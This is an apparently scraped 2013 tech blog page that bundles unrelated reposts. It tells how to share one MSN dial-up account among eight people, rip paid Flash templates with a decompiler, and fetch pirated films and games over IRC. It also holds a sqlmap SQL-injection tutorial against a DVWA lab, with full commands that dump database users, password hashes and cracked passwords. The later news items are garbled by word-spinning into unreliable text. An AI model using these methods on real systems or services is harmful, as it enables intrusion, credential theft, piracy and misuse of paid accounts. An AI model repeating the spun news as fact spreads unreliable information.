Ads 468x60px

Labels

Friday, January 18, 2013

How 8 People Can Use The Same Msn Dial Up Account


8 People Can Use The Same Msn Dial Up Account

its easy really. want to have an entire family on dial-up with just one bill?

step one. purchase 20 dollar a month subscription to MSN unlimited access dial up. This will include an MSN 9 cd which you will need. With the software installed, fill up your secondary account slots with new users. Make sure you pick @msn if it gives you the choice, hotmail email addresses will not work..

say the secondary account is johnsmith@msn.com type in the Dial up connection

USER : MSN/johnsmith
PASS: ******* (whatever)

connect to your local msn phone number and the other people you gave secondary accounts to will be able to do the same, while you are connected. Its a sweet deal considering everyone is paying about 2 bucks a month for internet access, especially if you cannot get broadband. if you wanted to sell off the access to people you could actually make money doing this.. but i do not suggest it.

I used to be an msn tech and this was a little known secret even to most of the employees.

After you do this you do not need the software any more. I would suggest keeping it on to micromanage everyone else's accounts. and for the simple fact that if they don't pitch in, cut them off HEHEHE

i'm on broadband now so i dont care if i tell you my little secret. anyone else knew of this?

How to rip Dynamic Flash Template


 -[ How to rip Dynamic Flash Template ]-

How to Rip TM Dynamic Flash Templates
by: Baisan

What you need:

Sample dynamic flash template from TM website
Sothink SWF Decompiler
Macromedia Flash
Yourself


1. browse or search your favorite dynamic flash template in TM website. If you got one... click the "view" link and new window will open with dynamic flash.. loading...

2. If the movie fully loaded, click View -> Source in your browser to bring the source code of the current page and in the source code, search for "IFRAME" and you will see the iframe page. In this example were going to try the 7045 dynamic template. get the URL(ex.
http://images.templatemonster.com/screenshots/7000/7045.html) then paste it to your browser... easy eh? wait! dont be to excited... erase the .html and change it to swf then press enter then you'll see the flash movie again icon_smile.gif.

3. copy the URL and download that SWF file.. use your favorite download manager.. mine I used flashget icon_smile.gif NOTE: dont close the browser we may need that later on.

4. open your Sothink SWF decompiler... click "Quick Open" then browse where you download your SWF/movie file. Click Export FLA to export your SWF to FLA, in short, save it as FLA icon_smile.gif

5. Open your Macromedia FLash and open the saved FLA file. press Control+Enter or publish the file... then wallah! the output window will come up with "Error opening URL blah blah blah..." dont panic, that error will help you where to get the remaining files.

6. Copy the first error, example: "7045_main.html" then go back to your browser and replace the 7045.swf to 7045_main.html press enter and you'll see a lot of text... nonsense text icon_lol.gif that text are your contents...

NOTE: when you save the remaining files dont forget to save with underscore sign (_) in the front on the file without the TM item number (e.g. 7045) if it is html save it as "_main.html" and same with the image save it as "_works1.jpg" save them where you save the FLA and SWF files. Continue browsing the file inside Flash application so you can track the remaining files... do the same until you finish downloading all the remaining the files.

Get Free Games


 Not Sure If Many People Use This Site, however heres A Few Steps To getting In.. And Getting The Latest Games..

Right 1st You Need mIRC (Download Below)

http://www.ircadmin.net/mirc/mirc614.exe

Once Downloaded And Installed.. Next Step Is To Get Yourself Connected To The Datavault Network..

Step 1 :- Open irc, Goto Tools,Options. Then Servers, Click Add
Under Description Type : DataVault
Under IRC Server Type : irc.addictz.net
Under Port(S) Type : 6667-6669

Now Click Ok..

Step 2 : Connecting To Irc.Addictz.Net

Goto Tools/Options/Servers
Select Datavault From Drop Down Menu
Tick "New Server Window"
Then Click Connect

A New Window Will Open Telling You That You Are Connecting To Irc.Addictz.net

Step 3 : Now You Have To Register YourSelf.

In The Window Type /msg nickserv register "your Password" "Your Valid Email"
Next Type /msg NickServ IDENTIFY "The Password You Just Entered"

It Should Now Say Your Registered!

Now Type /J #Datavault

Step 4 : The Bots In DataVault Spam What They Host Every 1 Hour, Becareful Not To Spam These Or Else You Will Be Banned..

Every Hour You Will See What Looks Like Below :-

** To request a file type: "/msg slut02 BITCH send #x
#1 392x [0.7G] Torque.DVDRiP.XviD-BRUTUS
#2 1509x [0.7G] The.Butterfly.Effect.DVDRip.XviD-DMT

It's Simple To Request A Download Now..

There Are Different Bots With Different Names, Ie Slut02 Is Just One Bot, There Are More Called Dv44, Dv33 Slut03 Etc.. However The Trigger Principle Is The Sa,e

Now If For Example You Wanted To Download "The ButterFly Effect", In The Main Chat Window You Would Type or Copy /msg slut02 BITCH send #2

Let Me Explaine.. /msg Is The Trigger, Slut02 Is The Bot BITCH and Send Are Both Triggers #2 Is The File Number You Want. Each Bot Can Host Numerouse Files, Ie #1 Being Another Film, #3 Also Being Another Film.

Once You Have Done That And Press Return, Just Sit Back And Wait.. Either The Download Will Start Straight Away, Or You Will Be Qued (*Cough Dodgy Spelling*)

Right Now To The Benifits Of #Datavault..

1: The Latest Release Of Most Films And Games.
2: 99.99% The Time You Get To Download At You Max BandWidth No Matter Your Connection (Either 56k (Omg Dont Download A 3 Gig File On That!!), Or A T1/OC3 Connection))

I Hope Someone Finds This HelpFull, If It's In The Wrong Place/ Or Inappropriate Then Plz Delete And Serve Me The Warning I Deserve....

Edit : It's A Good Idea To Have Auto Accept Dcc On, Incase Your Away When You Come InLine For Your Download, Generally Even If Your 20th In Que And It Says 3 Hours Wait, Your Prolly Looking At Around 30 Mins Waiting Slot..

Any Problems Please Let Me Know.. NN Peeps.. 

SQL Mapping


What is SQLmap?

SQLmap is a free and an open source tool that is used to detect and exploit SQL injection flaws. It has very nifty features that automate the process of detection and exploitation (database fingerprinting, access underlying file system, execute commands).

You can download SQLmap from SourceForge here: http://sourceforge.net/projects/sqlmap/

Who are the authors of SQLmap?

Bernardo Damele Assumpcao Guimaraes (@inquisb), you can contact him at bernardo@sqlmap.org and Miroslav Stampar (@stamparm), you can contact him at miroslav@sqlmap.org.

You can contact both developers by writing to dev@sqlmap.org.

What are commands of SQLmap?

Go to the folder that sqlmap.py resides in, and write the command:

#python sqlmap.py -h

Here is the full list of available options:

Options:

–version show program’s version number and exit
-h, –help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:

At least one of these options has to be specified to set the source to get target urls from

-d DIRECT Direct connection to the database
-u URL, –url=URL Target URL
-l LOGFILE Parse targets from Burp or WebScarab proxy logs
-m BULKFILE Scan multiple targets enlisted in a given textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file
Request:

These options can be used to specify how to connect to the target URL.

–data=DATA Data string to be sent through POST
–param-del=PDEL Character used for splitting parameter values
–cookie=COOKIE HTTP Cookie header
–load-cookies=LOC File containing cookies in Netscape/wget format
–cookie-urlencode URL Encode generated cookie injections
–drop-set-cookie Ignore Set-Cookie header from response
–user-agent=AGENT HTTP User-Agent header
–random-agent Use randomly selected HTTP User-Agent header
–randomize=RPARAM Randomly change value for given parameter(s)
–force-ssl Force usage of SSL/HTTPS requests
–host=HOST HTTP Host header
–referer=REFERER HTTP Referer header
–headers=HEADERS Extra headers (e.g. “Accept-Language: fr\nETag: 123″)
–auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
–auth-cred=ACRED HTTP authentication credentials (name:password)
–auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
–proxy=PROXY Use a HTTP proxy to connect to the target url
–proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
–ignore-proxy Ignore system default HTTP proxy
–delay=DELAY Delay in seconds between each HTTP request
–timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
–retries=RETRIES Retries when the connection timeouts (default 3)
–scope=SCOPE Regexp to filter targets from provided proxy log
–safe-url=SAFURL Url address to visit frequently during testing
–safe-freq=SAFREQ Test requests between two visits to a given safe url
–skip-urlencode Skip URL encoding of POST data
–eval=EVALCODE Evaluate provided Python code before the request (e.g.
“import hashlib;id2=hashlib.md5(id).hexdigest()”)
Optimization:

These options can be used to optimize the performance of SQLmap.

-o Turn on all optimization switches
–predict-output Predict common queries output
–keep-alive Use persistent HTTP(s) connections
–null-connection Retrieve page length without actual HTTP response body
–threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
Injection:

These options can be used to specify which parameters to test for,and provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
–dbms=DBMS Force back-end DBMS to this value
–os=OS Force back-end DBMS operating system to this value
–invalid-bignum Use big numbers for invalidating values
–invalid-logical Use logical operations for invalidating values
–no-cast Turn off payload casting mechanism
–prefix=PREFIX Injection payload prefix string
–suffix=SUFFIX Injection payload suffix string
–skip=SKIP Skip testing for given parameter(s)
–tamper=TAMPER Use given script(s) for tampering injection data
Detection:

These options can be used to specify how to parse and compare page content from HTTP responses when using the blind SQL injection technique.

–level=LEVEL Level of tests to perform (1-5, default 1)
–risk=RISK Risk of tests to perform (0-3, default 1)
–string=STRING String to match in the response when query is valid
–regexp=REGEXP Regexp to match in the response when query is valid
–code=CODE HTTP response code to match when the query is valid
–text-only Compare pages based only on the textual content
–titles Compare pages based only on their titles
Techniques:

These options can be used to tweak testing of specific SQL injection techniques.

–technique=TECH SQL injection techniques to test for (default “BEUST”)
–time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
–union-cols=UCOLS Range of columns to test for UNION query SQL injection
–union-char=UCHAR Character to use for bruteforcing number of columns
–dns-domain=DNAME Domain name used for DNS exfiltration attack
Fingerprint:

–f, –fingerprint Perform an extensive DBMS version fingerprint
Enumeration:

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

-b, –banner Retrieve DBMS banner
–current-user Retrieve DBMS current user
–current-db Retrieve DBMS current database
–is-dba Detect if the DBMS current user is DBA
–users Enumerate DBMS users
–passwords Enumerate DBMS users password hashes
–privileges Enumerate DBMS users privileges
–roles Enumerate DBMS users roles
–dbs Enumerate DBMS databases
–tables Enumerate DBMS database tables
–columns Enumerate DBMS database table columns
–schema Enumerate DBMS schema
–count Retrieve number of entries for table(s)
–dump Dump DBMS database table entries
–dump-all Dump all DBMS databases tables entries
–search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
–exclude-sysdbs Exclude DBMS system databases when enumerating tables
–start=LIMITSTART First query output entry to retrieve
–stop=LIMITSTOP Last query output entry to retrieve
–first=FIRSTCHAR First query output word character to retrieve
–last=LASTCHAR Last query output word character to retrieve
–sql-query=QUERY SQL statement to be executed
–sql-shell Prompt for an interactive SQL shell
Brute force:

These options can be used to run brute force checks.

–common-tables Check existence of common tables
–common-columns Check existence of common columns
User-defined function injection:

These options can be used to create custom user-defined functions

–udf-inject Inject custom user-defined functions
–shared-lib=SHLIB Local path of the shared library
File system access:

These options can be used to access the back-end database management system underlying file system.

–file-read=RFILE Read a file from the back-end DBMS file system
–file-write=WFILE Write a local file on the back-end DBMS file system
–file-dest=DFILE Back-end DBMS absolute filepath to write to
Operating system access:

These options can be used to access the back-end database management system and underlying operating system.

–os-cmd=OSCMD Execute an operating system command
–os-shell Prompt for an interactive operating system shell
–os-pwn Prompt for an out-of-band shell, meterpreter or VNC
–os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
–os-bof Stored procedure buffer overflow exploitation
–priv-esc Database process’ user privilege escalation
–msf-path=MSFPATH Local path where Metasploit Framework is installed
–tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:

These options can be used to access the back-end database management system Windows registry.

–reg-read Read a Windows registry key value
–reg-add Write a Windows registry key value data
–reg-del Delete a Windows registry key value
–reg-key=REGKEY Windows registry key
–reg-value=REGVAL Windows registry key value
–reg-data=REGDATA Windows registry key value data
–reg-type=REGTYPE Windows registry key value type
General:

These options can be used to set some general working parameters.

-t TRAFFICFILE Log all HTTP traffic into a textual file
–batch Never ask for user input, use the default behaviour
–charset=CHARSET Force character encoding used for data retrieval
–check-tor Check to see if Tor is used properly
–crawl=CRAWLDEPTH Crawl the website starting from the target url
–csv-del=CSVDEL Delimiting character used in CSV output (default “,”)
–eta Display for each output the estimated time of arrival
–flush-session Flush session file for current target
–forms Parse and test forms on target url
–fresh-queries Ignores query results stored in session file
–hex Uses DBMS hex function(s) for data retrieval
–parse-errors Parse and display DBMS error messages from responses
–replicate Replicate dumped data into a sqlite3 database
–save Save options to a configuration INI file
–tor Use Tor anonymity network
–tor-port=TORPORT Set Tor proxy port other than default
–tor-type=TORTYPE Set Tor proxy type (HTTP – default, SOCKS4 or SOCKS5)
–update Update sqlmap
Miscellaneous:

-z MNEMONICS Use short mnemonics (e.g. “flu,bat,ban,tec=EU”)
–beep Sound alert when SQL injection found
–check-payload Offline WAF/IPS/IDS payload detection testing
–check-waf Check for existence of WAF/IPS/IDS protection
–cleanup Clean up the DBMS by sqlmap specific UDF and tables
–dependencies Check for missing sqlmap dependencies
–disable-hash Disable password hash cracking mechanism
–disable-like Disable LIKE search of identificator names
–gpage=GOOGLEPAGE Use Google dork results from specified page number
–mobile Imitate smartphone through HTTP User-Agent header
–page-rank Display page rank (PR) for Google dork results
–purge-output Safely remove all content from output directory
–smart Conduct through tests only if positive heuristic(s)
–test-filter=TSTF Select tests by payloads and/or titles (e.g. ROW)
–wizard Simple wizard interface for beginner users
[*] shutting down at 17:46:04
As you can see SQLmap is well categorized as Target options, Request options, Optimization, Injection, Detection, Techniques, Fingerprint, Enumeration, etc.

How can I use SQLmap ?

For demonstration we create two virtual machines :

Victim machine that’s running window XP OS that has a web server that holds a vulnerable web application for example (DVWA).
Attacker machine that will be using Ubuntu 12.04 that is running SQLmap.
In this lab we will do the following : Use SQLmap to obtain the following pieces of information:

Enumerate MYSQL usernames and passwords.
Enumerate all databases.
Enumerate tables for a specified database.
Enumerate all users and passwords for a specified database table.
We need some information before beginning SQLmap and we need the current session cookies to maintain our state while penetrating, so I will use a Firefox add-on called “TamperData”.



Our cookie in this case is “security=high; PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″.

Then we will set DVWA security to low for demonstration:



Now lets go to the SQL injection section and enter any value and press submit. We will see the ID parameter in the get request like this:

“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

So this is our target page.

The following command will retrieve current database and current user:

“./sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -b –current-db –current-user”

Used Options:

-cookie : to set our cookie values “we change security from high to low in the cookie values”
-u : to specify our target URL
-b : to retrieve DBMS banner
-current-db : to retrieve the current database
-current-user: to retrieve the current user
Here are the results:



As you can see:

DBMS : MySQL version 5.0

OS version Ubuntu 12.04

current user: root

current db : DVWA

The following command will enumerate all DBMS users and password hashes that can crack it later for any further attacks.

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” –string=”Surname” –users –password”

Used Options:

–string : String to match in page when the query is valid
–users : Enumerate DBMS users
–password : Enumerate DBMS users password hashes


Here are the results:

database management system users [142]:

[*] ”@’kingasmk’

[*] ”@’localhost’

[*] ‘debian-sys-maint’@'localhost’

[*] ‘phpmyadmin’@'localhost’

[*] ‘root’@’127.0.0.1′

[*] ‘root’@'::1′

[*] ‘root’@'kingasmk’

[*] ‘root’@'localhost’

Database management system users password hashes:

[*] debian-sys-maint [1]:

password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

[*] phpmyadmin [1]:

password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

[*] root [4]:

password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

password hash: *C30441E06530498BC86019BF3211B94B3BAB295A

You can use any password cracker tool to get the plain text from that hash like “cain and abel, john and ripper”. The following command will enumerate all databases sachems on the system:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”

–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” –dbs”

Used Options:

–dbs: Enumerate DBMS databases


Here are the results:

available databases [5]:

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] phpmyadmin

Now we will try to enumerate DVWA tables.So let’s run this command:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa –tables”

Used Options:

-D : DBMS database to enumerate
-tables : Enumerate DBMS database tables


Here are the results:

Database: dvwa

[2 tables]

+————+

| guestbook |

| users |

+————+

Now let’s obtain the columns of users table.

Here are the commands:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users –columns”

Used Options:

-T : DBMS database table to enumerate
-columns : Enumerate DBMS database table columns


Here are the results:

Database: dvwa

Table: users

[6 columns]

+————+————-+

| Column | Type |

+————+————-+

| avatar | varchar(70) |

| first_name | varchar(15) |

| last_name | varchar(15) |

| password | varchar(32) |

| user | varchar(15) |

| user_id | int(6) |

+————+————-+

As you can see, there are interesting columns, those are user and password, lets dump them :) This command will dump all users and passwords values from user and password tables:

“sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users -C user,password –dump”

Used Options:

-T : DBMS database table to enumerate
-C: DBMS database table column to enumerate
-dump : Dump DBMS database table entries
SQLmap will ask you to crack your passwords, press enter to crack them:



Here are all users and plain text passwords :)

Database: dvwa

Table: users

[5 entries]

+———+———+———————————————+

| user_id | user | password |

+———+———+———————————————+

| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

| 2 | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) |

| 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |

| 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |

| 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+———+———+———————————————+

So now you can login as admin and change everything you want :)

Conclusion

SQLmap is a very powerful tool that should you practice to ease and automate the process of detection and exploitation.
Incoming search terms:

sqlmap ubuntu 12 04
sqlmap session cookie injection
sqlmap session cookie
install sqlmap ubuntu 12 04
wget post data Blind sql injection
sqlmap udf-inject
sqlmap dump большой таблицы
sqlmap filewrite windows
sqlmap dump table
sqlmap py infosecinstitute turla

Basics of INTERNET


The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.

No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.

All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.

An Internet user has access to a wide variety of services: electronic mail, file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.

The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.


--------------------------------------------------------------------------------

COMPONENTS OF THE INTERNET

--------------------------------------------------------------------------------

WORLD WIDE WEB
The World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e-mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.

The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user-friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet.

The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds.

Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3C now calls the language XHTML and considers it to be an application of the XML language standard.

The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet.

The Web provides a vast array of experiences including multimedia presentations, real-time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux.

For more complete information about the World Wide Web, see Understanding The World Wide Web.

E-MAIL
Electronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e-mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds.

A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora, Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type.

TELNET
Telnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words (locis.loc.gov) or numbers (140.147.254.3). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet nri.reston.va.us 185.

Telnet is available on the World Wide Web. Probably the most common Web-based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work.

With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet.

FTP
FTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more.

If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer.

FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at /http://www.ftpfind.com/. This option is easiest because you do not need to know FTP program commands.

E-MAIL DISCUSSION GROUPS
One of the benefits of the Internet is the opportunity it offers to people worldwide to communicate via e-mail. The Internet is home to a large community of individuals who carry out active discussions organized around topic-oriented forums distributed by e-mail. These are administered by software programs. Probably the most common program is the listserv.

A great variety of topics are covered by listservs, many of them academic in nature. When you subscribe to a listserv, messages from other subscribers are automatically sent to your electronic mailbox. You subscribe to a listserv by sending an e-mail message to a computer program called a listserver. Listservers are located on computer networks throughout the world. This program handles subscription information and distributes messages to and from subscribers. You must have a e-mail account to participate in a listserv discussion group. Visit Tile.net at /http://tile.net/ to see an example of a site that offers a searchablecollection of e-mail discussion groups.

Majordomo and Listproc are two other programs that administer e-mail discussion groups. The commands for subscribing to and managing your list memberships are similar to those of listserv.

USENET NEWS
Usenet News is a global electronic bulletin board system in which millions of computer users exchange information on a vast range of topics. The major difference between Usenet News and e-mail discussion groups is the fact that Usenet messages are stored on central computers, and users must connect to these computers to read or download the messages posted to these groups. This is distinct from e-mail distribution, in which messages arrive in the electronic mailboxes of each list member.

Usenet itself is a set of machines that exchanges messages, or articles, from Usenet discussion forums, called newsgroups. Usenet administrators control their own sites, and decide which (if any) newsgroups to sponsor and which remote newsgroups to allow into the system.

There are thousands of Usenet newsgroups in existence. While many are academic in nature, numerous newsgroups are organized around recreational topics. Much serious computer-related work takes place in Usenet discussions. A small number of e-mail discussion groups also exist as Usenet newsgroups.

The Usenet newsfeed can be read by a variety of newsreader software programs. For example, the Netscape suite comes with a newsreader program called Messenger. Newsreaders are also available as standalone products.

FAQ, RFC, FYI
FAQ stands for Frequently Asked Questions. These are periodic postings to Usenet newsgroups that contain a wealth of information related to the topic of the newsgroup. Many FAQs are quite extensive. FAQs are available by subscribing to individual Usenet newsgroups. A Web-based collection of FAQ resources has been collected by The Internet FAQ Consortium and is available at /http://www.faqs.org/.

RFC stands for Request for Comments. These are documents created by and distributed to the Internet community to help define the nuts and bolts of the Internet. They contain both technical specifications and general information.

FYI stands for For Your Information. These notes are a subset of RFCs and contain information of interest to new Internet users.

Links to indexes of all three of these information resources are available on the University Libraries Web site at /http://library.albany.edu/reference/faqs.html.

CHAT & INSTANT MESSENGING
Chat programs allow users on the Internet to communicate with each other by typing in real time. They are sometimes included as a feature of a Web site, where users can log into the "chat room" to exchange comments and information about the topics addressed on the site. Chat may take other, more wide-ranging forms. For example, America Online is well known for sponsoring a number of topical chat rooms.

Ibex Virtual Reality Desktop Beta For Mac Released


Ibex is virtual reality desktop environment (let’s call it a VRDE) which allows you to float desktops of arbitrary number and dimensions around you in a virtual space. Combined with a head mounted display, Ibex creates a 360 degree virtual world where you can do your computing. The sole developer behind the project, Hesham Wahba, continues to work on the Ibex VRDE in preparation for the Oculus Rift VR headset / head mounted display. Wahba has now launched a beta of Ibex for Mac which users can test even without an HMD.

Sourcefire VRT rules update addresses remote stack buffer overflow in rule 3:20275

Sourcefire VRT released a rules update on 17 JAN that included what they refer to as "a potential security issue with rule 3:20275 reported by Tavis Ormandy."
Tavis' Tweet states that "today's snort rules fix a remote stack buffer overflow It is found in rule 20275. Fixed by @sourcefire in just 48hrs. http://bit.ly/STm7Ij"
Fast turnaround by the Sourcefire gang. Here's the diff for the fix:
Compare: (<)D:\so_rules\src\netbios_kb961501-smb-printss-reponse.c (10885 bytes) with: (>)D:\so_rules\src\netbios_kb961501-smb-printss-reponse.c (10923 bytes)

Google files patent for eyewear that SHOOTS LASERS


Google has filed a patent for mounting twin lasers on the sides of a combine of glasses to show a keyboard on a user's body elements and use a camera to trace a hand's gestures for control.

"A pattern for a virtual data input device may be projected onto a 'display hand' of a user, and also the camera is also able to discover when the user uses associate opposite hand to pick things of the virtual data input device," the filing reads.

"In another example, the camera could discover when the show hand is moving and interpret show hand movements as inputs to the virtual data input device, and/or adjust the projection onto the moving show hand."

Microsoft to end Windows 8 discounts on January 31


Say what you will concerning Windows 8; a minimum of the upgrade from Windows 7 is cheap. Or it is for now. once Gregorian calendar month thirty one are going to be a different story.

Ever since Windows 8's Gregorian calendar month twenty six, 2012 launch, Microsoft has been offering retail Windows 8 professional upgrade DVDs for $69.99. on-line upgrades have been even cheaper, at $39.99. And customers UN agency bought new PCs or laptops with Windows 7 preloaded got the simplest deal of all: If they registered with Microsoft, the web Windows 8 upgrade cost them just $14.99.

Microsoft continually aforesaid these rates were temporary, but ample pundits did not believe it. Why would Redmond raise its costs, they argued, given however lukewarm client reaction to the new OS has been?

Well, place such notions aside. during a journal post on Fri, Microsoft confirmed that when it aforesaid its discounted Windows 8 upgrade pricing was for a restricted time only, it extremely meant it.

As previously proclaimed, all of the on top of costs end on Gregorian calendar month thirty one. beginning in Feb, all editions of Windows 8 can sell for their full list costs, which means the cheapest Windows 8 upgrade can opt for $119.99.

Note, however, that unlike the discounted upgrades offered previously, that value just gets you Windows 8, not Windows 8 professional. If you wish the extra professional options – as well as BitLocker encryption, domain property, and Hyper-V virtualization, among others – you'll have to distribute a little additional for the professional upgrade edition, priced at $199.99.

If you already have Windows 8 and you wish to upgrade to Windows 8 professional, the professional Pack upgrade can cost you $69.99 through Gregorian calendar month thirty one. After that, the worth goes up to $99.99.

These list costs square measure similar to what Microsoft charged to upgrade to Windows 7 from Windows visual percept or earlier, but they are still high in today's computing market. The last upgrade for Apple's OS X – presently the sole different thought desktop OS – cost just $20, and you can upgrade most desktop linux systems for complimentary.

Still, many purchasers won't actually upgrade the least bit. Instead, they'll get their initial style of Windows 8 once they buy a brand new laptop or pc. Microsoft claims it's sold  sixty million Windows 8 licenses thus far, with a good chunk of those getting to OEMs UN agency conceive to bundle the OS with their new kit.

In addition to ending its Windows upgrade discounts, Microsoft also will begin charging $9.99 for its Windows Media Center add-on pack on Gregorian calendar month thirty one. previously it had been a free upgrade for Windows 8 professional users.

Upgrade pricing for the uk, Europe, and different regions was not out there as the Reg visited press.

Microsoft's ARM blunder: 7 reasons why Windows RT was DOA


Analysis trade doomsayers were circling Windows eight like buzzards before it even launched, however they picked the incorrect carcass. Microsoft's real 2012 roadkill was Win8's ARM-powered cousin, Windows RT.

The chattering class's comparisons of Windows eight and Windows prospect ar premature – it {will|it'll} take many more quarters before we will gauge how Redmond's latest OS will play move into the marketplace. however with the vacation season behind US, it's now plain that Window RT is a flop.

Google Chrome 25 will serve searches over SSL from the omnibox even if users aren’t signed in


Google proclaimed one more security improvement for Chrome 25. in addition to killing silent extension installation, the omnibox in Google’s browser will send all searches over a Secure Sockets Layer (SSL) association.

Chrome already will this for users World Health Organization square measure signed in to Google: after they search from the address bar, their queries square measure sent over HTTPS. As of Chrome 25, however, the same will happen for users World Health Organization aren’t signed in to Google.

We saw Google was experimenting with this feature last month, but couldn’t get the company to treat the amendment. Either way, testing seems to be complete and Google is getting ready to roll out the protection improvement.

TSA to pull backscatter perv scanners from US airports


The USA Transportation Security Administration (TSA) has declared that it\'s propulsion all full-body scanners supported scatter X-ray technology from USA airports.

